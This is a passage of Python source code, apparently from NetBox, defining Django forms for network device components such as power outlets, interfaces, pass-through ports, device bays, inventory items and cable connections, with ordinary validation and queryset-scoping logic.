
    class Meta:
        nullable_fields = ('label', 'description')
class PowerPortCSVForm(CSVModelForm):
    """CSV import form for PowerPorts."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )

    class Meta:
        model = PowerPort
        fields = PowerPort.csv_headers
#
# Power outlets
#
class PowerOutletFilterForm(DeviceComponentFilterForm):
    """Filter form for the PowerOutlet list view."""
    model = PowerOutlet
    type = forms.MultipleChoiceField(
        choices=PowerOutletTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class PowerOutletForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single PowerOutlet."""
    power_port = forms.ModelChoiceField(
        queryset=PowerPort.objects.all(),
        required=False
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = PowerOutlet
        fields = [
            'device', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Offer only power ports that live on the same device as this outlet
        if hasattr(self.instance, 'device'):
            local_ports = PowerPort.objects.filter(device=self.instance.device)
            self.fields['power_port'].queryset = local_ports
class PowerOutletCreateForm(ComponentCreateForm):
    """Creation form for PowerOutlets (supports name/label patterns)."""
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    power_port = forms.ModelChoiceField(
        queryset=PowerPort.objects.all(),
        required=False
    )
    feed_leg = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletFeedLegChoices),
        required=False
    )
    field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'power_port', 'feed_leg', 'description', 'tags')

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Offer only power ports belonging to the parent Device
        parent_pk = self.initial.get('device') or self.data.get('device')
        parent = Device.objects.get(pk=parent_pk)
        self.fields['power_port'].queryset = PowerPort.objects.filter(device=parent)
class PowerOutletBulkCreateForm(
    form_from_model(PowerOutlet, ['type', 'feed_leg']),
    DeviceBulkAddComponentForm
):
    """Form for adding PowerOutlets to multiple Devices at once."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'feed_leg', 'description', 'tags')
class PowerOutletBulkEditForm(
    form_from_model(PowerOutlet, ['label', 'type', 'feed_leg', 'power_port', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk-edit form for PowerOutlets."""
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerOutlet.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    device = forms.ModelChoiceField(
        queryset=Device.objects.all(),
        required=False,
        disabled=True,
        widget=forms.HiddenInput()
    )

    class Meta:
        nullable_fields = ('label', 'type', 'feed_leg', 'power_port', 'description')

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit power_port queryset to PowerPorts which belong to the parent Device
        if 'device' in self.initial:
            # NOTE(review): .first() may return None if the pk is stale, which
            # would make the filter below match nothing — confirm callers always
            # pass a valid device pk.
            device = Device.objects.filter(pk=self.initial['device']).first()
            self.fields['power_port'].queryset = PowerPort.objects.filter(device=device)
        else:
            # No single parent device: editing outlets across devices, so a
            # common power_port choice cannot be offered
            self.fields['power_port'].choices = ()
            self.fields['power_port'].widget.attrs['disabled'] = True
class PowerOutletCSVForm(CSVModelForm):
    """CSV import form for PowerOutlets."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    power_port = CSVModelChoiceField(
        queryset=PowerPort.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Local power port which feeds this outlet'
    )
    feed_leg = CSVChoiceField(
        choices=PowerOutletFeedLegChoices,
        required=False,
        help_text='Electrical phase (for three-phase circuits)'
    )

    class Meta:
        model = PowerOutlet
        fields = PowerOutlet.csv_headers

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Resolve the parent device: from submitted data when bound, otherwise
        # from the instance; fall back to None if neither yields one.
        parent = None
        if self.is_bound:
            try:
                parent = self.fields['device'].to_python(self.data['device'])
            except forms.ValidationError:
                parent = None
        else:
            try:
                parent = self.instance.device
            except Device.DoesNotExist:
                parent = None

        # Restrict power_port choices to ports on the device or its VC master
        port_field = self.fields['power_port']
        if parent:
            port_field.queryset = PowerPort.objects.filter(
                device__in=[parent, parent.get_vc_master()]
            )
        else:
            port_field.queryset = PowerPort.objects.none()
#
# Interfaces
#
class InterfaceFilterForm(DeviceComponentFilterForm):
    """Filter form for the Interface list view."""
    model = Interface
    type = forms.MultipleChoiceField(
        choices=InterfaceTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    enabled = forms.NullBooleanField(
        required=False,
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    mac_address = forms.CharField(
        required=False,
        label='MAC address'
    )
    tag = TagFilterField(model)
class InterfaceForm(BootstrapMixin, InterfaceCommonForm, forms.ModelForm):
    """
    Create/edit form for a single Interface.

    __init__ limits LAG choices to the parent device (or its virtual chassis
    peers) and scopes VLAN selectors to the device's site.
    """
    untagged_vlan = DynamicModelChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        label='Untagged VLAN',
        display_field='display_name',
        brief_mode=False,
        query_params={
            # Placeholder; replaced with the device's site in __init__
            'site_id': 'null',
        }
    )
    tagged_vlans = DynamicModelMultipleChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        label='Tagged VLANs',
        display_field='display_name',
        brief_mode=False,
        query_params={
            # Placeholder; replaced with the device's site in __init__
            'site_id': 'null',
        }
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = Interface
        fields = [
            'device', 'name', 'label', 'type', 'enabled', 'lag', 'mac_address', 'mtu', 'mgmt_only', 'description',
            'mode', 'untagged_vlan', 'tagged_vlans', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
            'type': StaticSelect2(),
            'lag': StaticSelect2(),
            'mode': StaticSelect2(),
        }
        labels = {
            'mode': '802.1Q Mode',
        }
        help_texts = {
            'mode': INTERFACE_MODE_HELP_TEXT,
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # NOTE(review): bound data is assumed to always contain a valid
        # 'device' key (it is a hidden, view-supplied field) — confirm.
        if self.is_bound:
            device = Device.objects.get(pk=self.data['device'])
        else:
            device = self.instance.device

        # Limit LAG choices to interfaces belonging to this device or a peer VC member
        device_query = Q(device=device)
        if device.virtual_chassis:
            device_query |= Q(device__virtual_chassis=device.virtual_chassis)
        self.fields['lag'].queryset = Interface.objects.filter(
            device_query,
            type=InterfaceTypeChoices.TYPE_LAG
        ).exclude(pk=self.instance.pk)

        # Add current site to VLANs query params
        self.fields['untagged_vlan'].widget.add_query_param('site_id', device.site.pk)
        self.fields['tagged_vlans'].widget.add_query_param('site_id', device.site.pk)
class InterfaceCreateForm(ComponentCreateForm, InterfaceCommonForm):
    """Creation form for Interfaces (supports name/label patterns)."""
    type = forms.ChoiceField(
        choices=InterfaceTypeChoices,
        widget=StaticSelect2(),
    )
    enabled = forms.BooleanField(
        required=False,
        initial=True
    )
    lag = forms.ModelChoiceField(
        queryset=Interface.objects.all(),
        required=False,
        label='Parent LAG',
        widget=StaticSelect2(),
    )
    mtu = forms.IntegerField(
        required=False,
        min_value=INTERFACE_MTU_MIN,
        max_value=INTERFACE_MTU_MAX,
        label='MTU'
    )
    mac_address = forms.CharField(
        required=False,
        label='MAC Address'
    )
    mgmt_only = forms.BooleanField(
        required=False,
        label='Management only',
        help_text='This interface is used only for out-of-band management'
    )
    mode = forms.ChoiceField(
        choices=add_blank_choice(InterfaceModeChoices),
        required=False,
        widget=StaticSelect2(),
    )
    untagged_vlan = DynamicModelChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        display_field='display_name',
        brief_mode=False,
        query_params={
            'site_id': 'null',
        }
    )
    tagged_vlans = DynamicModelMultipleChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        display_field='display_name',
        brief_mode=False,
        query_params={
            'site_id': 'null',
        }
    )
    field_order = (
        'device', 'name_pattern', 'label_pattern', 'type', 'enabled', 'lag', 'mtu', 'mac_address', 'description',
        'mgmt_only', 'mode', 'untagged_vlan', 'tagged_vlans', 'tags'
    )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Restrict LAG choices to the parent device and any virtual-chassis peers
        parent = Device.objects.get(
            pk=self.initial.get('device') or self.data.get('device')
        )
        lag_filter = Q(device=parent)
        if parent.virtual_chassis:
            lag_filter |= Q(device__virtual_chassis=parent.virtual_chassis)
        self.fields['lag'].queryset = Interface.objects.filter(lag_filter, type=InterfaceTypeChoices.TYPE_LAG)

        # Scope both VLAN selectors to the parent device's site
        for vlan_field in ('untagged_vlan', 'tagged_vlans'):
            self.fields[vlan_field].widget.add_query_param('site_id', parent.site.pk)
class InterfaceBulkCreateForm(
    form_from_model(Interface, ['type', 'enabled', 'mtu', 'mgmt_only']),
    DeviceBulkAddComponentForm
):
    """Form for adding Interfaces to multiple Devices at once."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'enabled', 'mtu', 'mgmt_only', 'description', 'tags')
class InterfaceBulkEditForm(
    form_from_model(Interface, [
        'label', 'type', 'lag', 'mac_address', 'mtu', 'description', 'mode'
    ]),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """
    Bulk-edit form for Interfaces.

    __init__ restricts LAG and VLAN choices: with a single parent device they
    are scoped to that device/site; otherwise a common site is inferred from
    the selected interfaces (if they all share one) and LAG editing is disabled.
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=Interface.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    device = forms.ModelChoiceField(
        queryset=Device.objects.all(),
        required=False,
        disabled=True,
        widget=forms.HiddenInput()
    )
    enabled = forms.NullBooleanField(
        required=False,
        widget=BulkEditNullBooleanSelect
    )
    mgmt_only = forms.NullBooleanField(
        required=False,
        widget=BulkEditNullBooleanSelect,
        label='Management only'
    )
    untagged_vlan = DynamicModelChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        display_field='display_name',
        brief_mode=False,
        query_params={
            # Placeholder; replaced with a concrete site in __init__ when one is known
            'site_id': 'null',
        }
    )
    tagged_vlans = DynamicModelMultipleChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        display_field='display_name',
        brief_mode=False,
        query_params={
            # Placeholder; replaced with a concrete site in __init__ when one is known
            'site_id': 'null',
        }
    )

    class Meta:
        nullable_fields = (
            'label', 'lag', 'mac_address', 'mtu', 'description', 'mode', 'untagged_vlan', 'tagged_vlans'
        )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit LAG choices to interfaces which belong to the parent device (or VC master)
        if 'device' in self.initial:
            # NOTE(review): .first() may return None for a stale pk, which would
            # make device.get_vc_master() below raise — confirm callers always
            # pass a valid device pk.
            device = Device.objects.filter(pk=self.initial['device']).first()
            self.fields['lag'].queryset = Interface.objects.filter(
                device__in=[device, device.get_vc_master()],
                type=InterfaceTypeChoices.TYPE_LAG
            )

            # Add current site to VLANs query params
            self.fields['untagged_vlan'].widget.add_query_param('site_id', device.site.pk)
            self.fields['tagged_vlans'].widget.add_query_param('site_id', device.site.pk)
        else:
            # See 4523
            if 'pk' in self.initial:
                site = None
                interfaces = Interface.objects.filter(pk__in=self.initial['pk']).prefetch_related('device__site')

                # Check interface sites.  First interface should set site, further interfaces will either continue the
                # loop or reset back to no site and break the loop.
                for interface in interfaces:
                    if site is None:
                        site = interface.device.site
                    elif interface.device.site is not site:
                        site = None
                        break

                if site is not None:
                    self.fields['untagged_vlan'].widget.add_query_param('site_id', site.pk)
                    self.fields['tagged_vlans'].widget.add_query_param('site_id', site.pk)

            self.fields['lag'].choices = ()
            self.fields['lag'].widget.attrs['disabled'] = True

    def clean(self):
        super().clean()

        # Untagged interfaces cannot be assigned tagged VLANs
        if self.cleaned_data['mode'] == InterfaceModeChoices.MODE_ACCESS and self.cleaned_data['tagged_vlans']:
            raise forms.ValidationError({
                'mode': "An access interface cannot have tagged VLANs assigned."
            })

        # Remove all tagged VLAN assignments from "tagged all" interfaces
        elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED_ALL:
            self.cleaned_data['tagged_vlans'] = []
class InterfaceCSVForm(CSVModelForm):
    """CSV import form for Interface objects."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    lag = CSVModelChoiceField(
        queryset=Interface.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Parent LAG interface'
    )
    type = CSVChoiceField(
        choices=InterfaceTypeChoices,
        help_text='Physical medium'
    )
    mode = CSVChoiceField(
        choices=InterfaceModeChoices,
        required=False,
        help_text='IEEE 802.1Q operational mode (for L2 interfaces)'
    )

    class Meta:
        model = Interface
        fields = Interface.csv_headers

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit LAG choices to interfaces belonging to this device (or virtual chassis)
        device = None
        if self.is_bound and 'device' in self.data:
            try:
                device = self.fields['device'].to_python(self.data['device'])
            except forms.ValidationError:
                # Invalid device reference; leave device as None and fall through to the empty queryset
                pass
        if device and device.virtual_chassis:
            self.fields['lag'].queryset = Interface.objects.filter(
                Q(device=device) | Q(device__virtual_chassis=device.virtual_chassis),
                type=InterfaceTypeChoices.TYPE_LAG
            )
        elif device:
            self.fields['lag'].queryset = Interface.objects.filter(
                device=device,
                type=InterfaceTypeChoices.TYPE_LAG
            )
        else:
            self.fields['lag'].queryset = Interface.objects.none()

    def clean_enabled(self):
        # Make sure enabled is True when it's not included in the uploaded data
        if 'enabled' not in self.data:
            return True
        else:
            return self.cleaned_data['enabled']
#
# Front pass-through ports
#
class FrontPortFilterForm(DeviceComponentFilterForm):
    """Filter form for FrontPort objects."""
    model = FrontPort
    type = forms.MultipleChoiceField(
        choices=PortTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class FrontPortForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single FrontPort."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = FrontPort
        fields = [
            'device', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
            'type': StaticSelect2(),
            'rear_port': StaticSelect2(),
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit RearPort choices to the local device
        if hasattr(self.instance, 'device'):
            self.fields['rear_port'].queryset = self.fields['rear_port'].queryset.filter(
                device=self.instance.device
            )
# TODO: Merge with FrontPortTemplateCreateForm to remove duplicate logic
class FrontPortCreateForm(ComponentCreateForm):
    """Bulk-create form for front ports, pairing each new port with a free rear port position."""
    type = forms.ChoiceField(
        choices=PortTypeChoices,
        widget=StaticSelect2(),
    )
    rear_port_set = forms.MultipleChoiceField(
        choices=[],
        label='Rear ports',
        help_text='Select one rear port assignment for each front port being created.',
    )
    field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'rear_port_set', 'description', 'tags')

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # NOTE(review): raises Device.DoesNotExist if neither initial nor submitted data
        # carries a valid device PK — confirm callers always supply one.
        device = Device.objects.get(
            pk=self.initial.get('device') or self.data.get('device')
        )

        # Determine which rear port positions are occupied. These will be excluded from the list of available
        # mappings.
        occupied_port_positions = [
            (front_port.rear_port_id, front_port.rear_port_position)
            for front_port in device.frontports.all()
        ]

        # Populate rear port choices: one "<pk>:<position>" entry per free position
        choices = []
        rear_ports = RearPort.objects.filter(device=device)
        for rear_port in rear_ports:
            for i in range(1, rear_port.positions + 1):
                if (rear_port.pk, i) not in occupied_port_positions:
                    choices.append(
                        ('{}:{}'.format(rear_port.pk, i), '{}:{}'.format(rear_port.name, i))
                    )
        self.fields['rear_port_set'].choices = choices

    def clean(self):
        super().clean()

        # Validate that the number of ports being created equals the number of selected (rear port, position) tuples
        front_port_count = len(self.cleaned_data['name_pattern'])
        rear_port_count = len(self.cleaned_data['rear_port_set'])
        if front_port_count != rear_port_count:
            raise forms.ValidationError({
                'rear_port_set': 'The provided name pattern will create {} ports, however {} rear port assignments '
                                 'were selected. These counts must match.'.format(front_port_count, rear_port_count)
            })

    def get_iterative_data(self, iteration):
        # Assign rear port and position from selected set; entries are "<pk>:<position>" strings
        rear_port, position = self.cleaned_data['rear_port_set'][iteration].split(':')

        return {
            'rear_port': int(rear_port),
            'rear_port_position': int(position),
        }
# class FrontPortBulkCreateForm(
# form_from_model(FrontPort, ['label', 'type', 'description', 'tags']),
# DeviceBulkAddComponentForm
# ):
# pass
class FrontPortBulkEditForm(
    form_from_model(FrontPort, ['label', 'type', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk edit form for FrontPort objects."""
    pk = forms.ModelMultipleChoiceField(
        queryset=FrontPort.objects.all(),
        widget=forms.MultipleHiddenInput()
    )

    class Meta:
        # Fields which may be cleared via bulk editing
        nullable_fields = ('label', 'description')
class FrontPortCSVForm(CSVModelForm):
    """CSV import form for FrontPort objects."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    rear_port = CSVModelChoiceField(
        queryset=RearPort.objects.all(),
        to_field_name='name',
        help_text='Corresponding rear port'
    )
    type = CSVChoiceField(
        choices=PortTypeChoices,
        help_text='Physical medium classification'
    )

    class Meta:
        model = FrontPort
        fields = FrontPort.csv_headers
        help_texts = {
            'rear_port_position': 'Mapped position on corresponding rear port',
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit RearPort choices to those belonging to this device (or VC master)
        if self.is_bound:
            try:
                device = self.fields['device'].to_python(self.data['device'])
            except forms.ValidationError:
                device = None
        else:
            try:
                device = self.instance.device
            except Device.DoesNotExist:
                device = None

        if device:
            self.fields['rear_port'].queryset = RearPort.objects.filter(
                device__in=[device, device.get_vc_master()]
            )
        else:
            self.fields['rear_port'].queryset = RearPort.objects.none()
#
# Rear pass-through ports
#
class RearPortFilterForm(DeviceComponentFilterForm):
    """Filter form for RearPort objects."""
    model = RearPort
    type = forms.MultipleChoiceField(
        choices=PortTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class RearPortForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single RearPort."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = RearPort
        fields = [
            'device', 'name', 'label', 'type', 'positions', 'description', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
            'type': StaticSelect2(),
        }
class RearPortCreateForm(ComponentCreateForm):
    """Bulk-create form for rear ports."""
    type = forms.ChoiceField(
        choices=PortTypeChoices,
        widget=StaticSelect2(),
    )
    positions = forms.IntegerField(
        min_value=REARPORT_POSITIONS_MIN,
        max_value=REARPORT_POSITIONS_MAX,
        initial=1,
        help_text='The number of front ports which may be mapped to each rear port'
    )
    field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'positions', 'description', 'tags')
class RearPortBulkCreateForm(
    form_from_model(RearPort, ['type', 'positions']),
    DeviceBulkAddComponentForm
):
    """Bulk-add form for rear ports across multiple devices."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'positions', 'description', 'tags')
class RearPortBulkEditForm(
    form_from_model(RearPort, ['label', 'type', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk edit form for RearPort objects."""
    pk = forms.ModelMultipleChoiceField(
        queryset=RearPort.objects.all(),
        widget=forms.MultipleHiddenInput()
    )

    class Meta:
        # Fields which may be cleared via bulk editing
        nullable_fields = ('label', 'description')
class RearPortCSVForm(CSVModelForm):
    """CSV import form for RearPort objects."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    type = CSVChoiceField(
        help_text='Physical medium classification',
        choices=PortTypeChoices,
    )

    class Meta:
        model = RearPort
        fields = RearPort.csv_headers
        help_texts = {
            'positions': 'Number of front ports which may be mapped'
        }
#
# Device bays
#
class DeviceBayFilterForm(DeviceComponentFilterForm):
    """Filter form for DeviceBay objects."""
    model = DeviceBay
    tag = TagFilterField(model)
class DeviceBayForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single DeviceBay."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = DeviceBay
        fields = [
            'device', 'name', 'label', 'description', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
        }
class DeviceBayCreateForm(ComponentCreateForm):
    """Bulk-create form for device bays."""
    field_order = ('device', 'name_pattern', 'label_pattern', 'description', 'tags')
class PopulateDeviceBayForm(BootstrapMixin, forms.Form):
    """Form for installing a child device into an existing device bay."""
    installed_device = forms.ModelChoiceField(
        queryset=Device.objects.all(),
        label='Child Device',
        help_text="Child devices must first be created and assigned to the site/rack of the parent device.",
        widget=StaticSelect2(),
    )

    def __init__(self, device_bay, *args, **kwargs):
        """Restrict candidates to unassigned child-role devices colocated with the parent."""
        super().__init__(*args, **kwargs)

        self.fields['installed_device'].queryset = Device.objects.filter(
            site=device_bay.device.site,
            rack=device_bay.device.rack,
            parent_bay__isnull=True,
            device_type__u_height=0,
            device_type__subdevice_role=SubdeviceRoleChoices.ROLE_CHILD
        ).exclude(pk=device_bay.device.pk)
class DeviceBayBulkCreateForm(DeviceBulkAddComponentForm):
    """Bulk-add form for device bays across multiple devices."""
    field_order = ('name_pattern', 'label_pattern', 'description', 'tags')
class DeviceBayBulkEditForm(
    form_from_model(DeviceBay, ['label', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk edit form for DeviceBay objects."""
    pk = forms.ModelMultipleChoiceField(
        queryset=DeviceBay.objects.all(),
        widget=forms.MultipleHiddenInput()
    )

    class Meta:
        # Fields which may be cleared via bulk editing
        nullable_fields = ('label', 'description')
class DeviceBayCSVForm(CSVModelForm):
    """CSV import form for DeviceBay objects."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    installed_device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Child device installed within this bay',
        error_messages={
            'invalid_choice': 'Child device not found.',
        }
    )

    class Meta:
        model = DeviceBay
        fields = DeviceBay.csv_headers

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit installed device choices to devices of the correct type and location
        if self.is_bound:
            try:
                device = self.fields['device'].to_python(self.data['device'])
            except forms.ValidationError:
                device = None
        else:
            try:
                device = self.instance.device
            except Device.DoesNotExist:
                device = None

        if device:
            self.fields['installed_device'].queryset = Device.objects.filter(
                site=device.site,
                rack=device.rack,
                parent_bay__isnull=True,
                device_type__u_height=0,
                device_type__subdevice_role=SubdeviceRoleChoices.ROLE_CHILD
            ).exclude(pk=device.pk)
        else:
            # Bugfix: this previously assigned Interface.objects.none() — an empty queryset
            # of the wrong model — to a Device choice field. Use the matching model.
            self.fields['installed_device'].queryset = Device.objects.none()
#
# Inventory items
#
class InventoryItemForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single InventoryItem."""
    device = DynamicModelChoiceField(
        queryset=Device.objects.all(),
        display_field='display_name'
    )
    # Parent item choices follow the selected device via the dynamic query param
    parent = DynamicModelChoiceField(
        queryset=InventoryItem.objects.all(),
        required=False,
        query_params={
            'device_id': '$device'
        }
    )
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = InventoryItem
        fields = [
            'device', 'parent', 'name', 'label', 'manufacturer', 'part_id', 'serial', 'asset_tag', 'description',
            'tags',
        ]
class InventoryItemCreateForm(ComponentCreateForm):
    """Bulk-create form for inventory items."""
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )
    parent = DynamicModelChoiceField(
        queryset=InventoryItem.objects.all(),
        required=False,
        query_params={
            'device_id': '$device'
        }
    )
    part_id = forms.CharField(
        max_length=50,
        required=False,
        label='Part ID'
    )
    serial = forms.CharField(
        max_length=50,
        required=False,
    )
    asset_tag = forms.CharField(
        max_length=50,
        required=False,
    )
    field_order = (
        'device', 'parent', 'name_pattern', 'label_pattern', 'manufacturer', 'part_id', 'serial', 'asset_tag',
        'description', 'tags',
    )
class InventoryItemCSVForm(CSVModelForm):
    """CSV import form for InventoryItem objects."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    manufacturer = CSVModelChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='name',
        required=False
    )

    class Meta:
        model = InventoryItem
        fields = InventoryItem.csv_headers
class InventoryItemBulkCreateForm(
    form_from_model(InventoryItem, ['manufacturer', 'part_id', 'serial', 'asset_tag', 'discovered']),
    DeviceBulkAddComponentForm
):
    """Bulk-add form for inventory items across multiple devices."""
    field_order = (
        'name_pattern', 'label_pattern', 'manufacturer', 'part_id', 'serial', 'asset_tag', 'discovered', 'description',
        'tags',
    )
class InventoryItemBulkEditForm(
    form_from_model(InventoryItem, ['label', 'manufacturer', 'part_id', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk edit form for InventoryItem objects."""
    pk = forms.ModelMultipleChoiceField(
        queryset=InventoryItem.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    # Redeclared to use a dynamic (AJAX-backed) choice field
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )

    class Meta:
        # Fields which may be cleared via bulk editing
        nullable_fields = ('label', 'manufacturer', 'part_id', 'description')
class InventoryItemFilterForm(DeviceComponentFilterForm):
    """Filter form for InventoryItem objects."""
    model = InventoryItem
    manufacturer = DynamicModelMultipleChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='slug',
        required=False
    )
    serial = forms.CharField(
        required=False
    )
    asset_tag = forms.CharField(
        required=False
    )
    discovered = forms.NullBooleanField(
        required=False,
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    tag = TagFilterField(model)
#
# Cables
#
class ConnectCableToDeviceForm(BootstrapMixin, CustomFieldModelForm):
    """
    Base form for connecting a Cable to a Device component.

    The region/site/rack/device fields chain together via dynamic query params to
    progressively narrow the B-side termination choices; subclasses supply the
    termination_b_id field for the specific component type.
    """
    termination_b_region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        label='Region',
        required=False
    )
    termination_b_site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        label='Site',
        required=False,
        query_params={
            'region_id': '$termination_b_region'
        }
    )
    termination_b_rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        label='Rack',
        required=False,
        display_field='display_name',
        null_option='None',
        query_params={
            'site_id': '$termination_b_site'
        }
    )
    termination_b_device = DynamicModelChoiceField(
        queryset=Device.objects.all(),
        label='Device',
        required=False,
        display_field='display_name',
        query_params={
            'site_id': '$termination_b_site',
            'rack_id': '$termination_b_rack',
        }
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = Cable
        fields = [
            'termination_b_region', 'termination_b_site', 'termination_b_rack', 'termination_b_device',
            'termination_b_id', 'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
        ]
        widgets = {
            'status': StaticSelect2,
            'type': StaticSelect2,
            'length_unit': StaticSelect2,
        }

    def clean_termination_b_id(self):
        # Return the PK rather than the object
        return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class ConnectCableToConsolePortForm(ConnectCableToDeviceForm):
    """Connect a cable to a ConsolePort on the B side."""
    termination_b_id = DynamicModelChoiceField(
        queryset=ConsolePort.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
class ConnectCableToConsoleServerPortForm(ConnectCableToDeviceForm):
    """Connect a cable to a ConsoleServerPort on the B side."""
    termination_b_id = DynamicModelChoiceField(
        queryset=ConsoleServerPort.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
class ConnectCableToPowerPortForm(ConnectCableToDeviceForm):
    """Connect a cable to a PowerPort on the B side."""
    termination_b_id = DynamicModelChoiceField(
        queryset=PowerPort.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
class ConnectCableToPowerOutletForm(ConnectCableToDeviceForm):
    """Connect a cable to a PowerOutlet on the B side."""
    termination_b_id = DynamicModelChoiceField(
        queryset=PowerOutlet.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
class ConnectCableToInterfaceForm(ConnectCableToDeviceForm):
    """Connect a cable to an Interface on the B side (physical interfaces only)."""
    termination_b_id = DynamicModelChoiceField(
        queryset=Interface.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device',
            'kind': 'physical',
        }
    )
class ConnectCableToFrontPortForm(ConnectCableToDeviceForm):
    """Connect a cable to a FrontPort on the B side."""
    termination_b_id = DynamicModelChoiceField(
        queryset=FrontPort.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
